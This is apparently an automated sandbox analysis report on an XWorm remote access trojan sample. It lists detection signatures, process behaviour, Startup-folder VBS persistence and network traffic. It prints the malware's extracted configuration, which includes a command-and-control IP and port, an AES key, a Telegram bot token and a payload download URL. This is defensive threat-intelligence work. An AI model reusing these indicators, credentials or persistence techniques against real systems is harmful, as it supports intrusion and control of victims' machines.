Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref#103052.exe

Overview

General Information

Sample name:Ref#103052.exe
Analysis ID:1586494
MD5:bac93b85bd7054a23583f29d19fe4206
SHA1:58e5d1d350f8ed03bf70a9d1c4295677b5f9eae3
SHA256:462e6b70a2eb82a0b3daf58c079e6df3a1360081059220e5832b8c0cffa51b33
Tags:exeuser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Ref#103052.exe (PID: 7060 cmdline: "C:\Users\user\Desktop\Ref#103052.exe" MD5: BAC93B85BD7054A23583F29D19FE4206)
    • Ref#103052.exe (PID: 1240 cmdline: "C:\Users\user\Desktop\Ref#103052.exe" MD5: BAC93B85BD7054A23583F29D19FE4206)
      • WerFault.exe (PID: 3848 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 928 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000008.00000002.3122065596.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000008.00000002.3122065596.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x109da:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x10a77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x10b8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xfa48:$cnc4: POST / HTTP/1.1
      00000000.00000002.2280032784.00000000061A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Click to see the 9 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.Ref#103052.exe.3c8eeb8.3.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.Ref#103052.exe.61a0000.10.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              8.2.Ref#103052.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                8.2.Ref#103052.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  8.2.Ref#103052.exe.400000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                  • 0xdc81:$str01: $VB$Local_Port
                  • 0xdca5:$str02: $VB$Local_Host
                  • 0xbe41:$str03: get_Jpeg
                  • 0xc5f9:$str04: get_ServicePack
                  • 0xef86:$str05: Select * from AntivirusProduct
                  • 0xf5c8:$str06: PCRestart
                  • 0xf5dc:$str07: shutdown.exe /f /r /t 0
                  • 0xf68e:$str08: StopReport
                  • 0xf664:$str09: StopDDos
                  • 0xf75a:$str10: sendPlugin
                  • 0xf8f8:$str12: -ExecutionPolicy Bypass -File "
                  • 0xfd2d:$str13: Content-length: 5235
                  Click to see the 11 entries

                  Sigma Signatures

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Ref#103052.exe, ProcessId: 7060, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbs

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: Ref#103052.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Wnuth.exeAvira: detection malicious, Label: HEUR/AGEN.1323669
                  Found malware configuration
                  Source: 00000008.00000002.3124056330.0000000002C31000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Wnuth.exeReversingLabs: Detection: 57%
                  Multi AV Scanner detection for submitted file
                  Source: Ref#103052.exeVirustotal: Detection: 56%Perma Link
                  Source: Ref#103052.exeReversingLabs: Detection: 57%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Wnuth.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: Ref#103052.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmpString decryptor: 89.40.31.232
                  Source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmpString decryptor: 1717
                  Source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
                  Source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmpString decryptor: 28Nov2024
                  Source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
                  Source: Ref#103052.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.7:49704 version: TLS 1.2
                  Source: Ref#103052.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\dll\System.pdb source: Ref#103052.exe, 00000008.00000002.3123485015.0000000001059000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: Ref#103052.exe, 00000008.00000002.3123485015.0000000001059000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Ref#103052.exe, 00000008.00000002.3123485015.0000000001092000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#103052.exe, 00000000.00000002.2280909559.00000000063A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Desktop\Ref#103052.PDBri source: Ref#103052.exe, 00000008.00000002.3123485015.000000000109C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#103052.exe, 00000000.00000002.2280909559.00000000063A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: n,C:\Windows\System.pdb source: Ref#103052.exe, 00000008.00000002.3122393969.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.pdbft source: Ref#103052.exe, 00000008.00000002.3123485015.0000000001059000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.pdb[ source: Ref#103052.exe, 00000008.00000002.3123485015.00000000010B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: Ref#103052.exe, 00000008.00000002.3123485015.0000000001042000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb source: Ref#103052.exe, 00000008.00000002.3123485015.0000000001092000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ##.pdb source: Ref#103052.exe, 00000008.00000002.3122393969.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 4x nop then jmp 0611E538h0_2_0611E338
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 4x nop then jmp 0611E538h0_2_0611E348
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 4x nop then jmp 0611DC3Ch0_2_0611DBD8
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 4x nop then jmp 0611DC3Ch0_2_0611DBC9
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 4x nop then jmp 0612B437h0_2_0612B4C5
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 4x nop then jmp 0631489Ah0_2_06314637
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 4x nop then jmp 0631489Ah0_2_06314538
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 4x nop then jmp 0631489Ah0_2_0631452B

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 89.40.31.232
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 8.2.Ref#103052.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.7:53662 -> 162.159.36.2:53
                  Source: Joe Sandbox ViewIP Address: 194.15.112.248 194.15.112.248
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficHTTP traffic detected: GET /STEq HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /STEq HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: oshi.at
                  Source: Ref#103052.exe, Wnuth.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                  Source: Ref#103052.exe, Wnuth.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                  Source: Ref#103052.exe, Wnuth.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                  Source: Ref#103052.exe, Wnuth.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                  Source: Ref#103052.exe, Wnuth.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                  Source: Ref#103052.exe, Wnuth.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                  Source: Ref#103052.exe, Wnuth.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                  Source: Ref#103052.exe, Wnuth.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                  Source: Ref#103052.exe, 00000000.00000002.2266018230.0000000002541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Ref#103052.exe, Wnuth.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                  Source: Ref#103052.exe, Wnuth.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                  Source: Ref#103052.exe, Wnuth.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                  Source: Ref#103052.exe, 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000008.00000002.3122065596.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: Ref#103052.exe, 00000000.00000002.2266018230.0000000002541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
                  Source: Ref#103052.exe, 00000000.00000002.2266018230.0000000002541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/STEq
                  Source: Ref#103052.exe, Wnuth.exe.0.drString found in binary or memory: https://oshi.at/STEqM
                  Source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: Ref#103052.exe, Wnuth.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.7:49704 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 8.2.Ref#103052.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 8.2.Ref#103052.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000008.00000002.3122065596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_06427900 NtProtectVirtualMemory,0_2_06427900
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0642B1E8 NtResumeThread,0_2_0642B1E8
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_064278F8 NtProtectVirtualMemory,0_2_064278F8
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0642B1E0 NtResumeThread,0_2_0642B1E0
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_00B1B1630_2_00B1B163
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_00B176700_2_00B17670
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_00B197F00_2_00B197F0
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_00B176610_2_00B17661
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_00B139380_2_00B13938
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_00B139280_2_00B13928
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_00B13EC80_2_00B13EC8
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0611A6180_2_0611A618
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_06120B980_2_06120B98
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_06120B8A0_2_06120B8A
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_061200060_2_06120006
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_061200400_2_06120040
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_061220F00_2_061220F0
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_061221000_2_06122100
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062964950_2_06296495
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062965300_2_06296530
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062910DB0_2_062910DB
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0629A1B10_2_0629A1B1
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_06299AE00_2_06299AE0
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0629DB300_2_0629DB30
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062979380_2_06297938
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0629A7E90_2_0629A7E9
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0629A7F80_2_0629A7F8
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062900070_2_06290007
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062900400_2_06290040
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0629F1480_2_0629F148
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0629DE670_2_0629DE67
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_06299ADF0_2_06299ADF
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0629790D0_2_0629790D
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062F04480_2_062F0448
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062F1C3F0_2_062F1C3F
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062F04380_2_062F0438
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062F1C580_2_062F1C58
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062F82800_2_062F8280
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062F7BB80_2_062F7BB8
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062F7BC80_2_062F7BC8
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0631EFA00_2_0631EFA0
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_063124390_2_06312439
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_063129510_2_06312951
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_063300060_2_06330006
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_063300400_2_06330040
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0633E9600_2_0633E960
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_064245880_2_06424588
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_064245450_2_06424545
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0642457A0_2_0642457A
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_065EFB980_2_065EFB98
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_065EE6080_2_065EE608
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_065EEB480_2_065EEB48
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_065D00400_2_065D0040
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_065D00060_2_065D0006
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 8_2_00F316808_2_00F31680
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 928
                  Source: Ref#103052.exeStatic PE information: invalid certificate
                  Source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#103052.exe
                  Source: Ref#103052.exe, 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRaw.exe4 vs Ref#103052.exe
                  Source: Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#103052.exe
                  Source: Ref#103052.exe, 00000000.00000002.2265574582.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ref#103052.exe
                  Source: Ref#103052.exe, 00000000.00000002.2280909559.00000000063A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#103052.exe
                  Source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003E20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#103052.exe
                  Source: Ref#103052.exe, 00000000.00000000.1262982600.00000000002DE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameege.exe: vs Ref#103052.exe
                  Source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#103052.exe
                  Source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#103052.exe
                  Source: Ref#103052.exe, 00000000.00000002.2279193631.0000000006000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTkdeca.dll" vs Ref#103052.exe
                  Source: Ref#103052.exe, 00000000.00000002.2266018230.0000000002956000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRaw.exe4 vs Ref#103052.exe
                  Source: Ref#103052.exe, 00000000.00000002.2266018230.000000000258C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Ref#103052.exe
                  Source: Ref#103052.exe, 00000008.00000002.3122065596.0000000000416000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRaw.exe4 vs Ref#103052.exe
                  Source: Ref#103052.exeBinary or memory string: OriginalFilenameege.exe: vs Ref#103052.exe
                  Source: Ref#103052.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 8.2.Ref#103052.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 8.2.Ref#103052.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
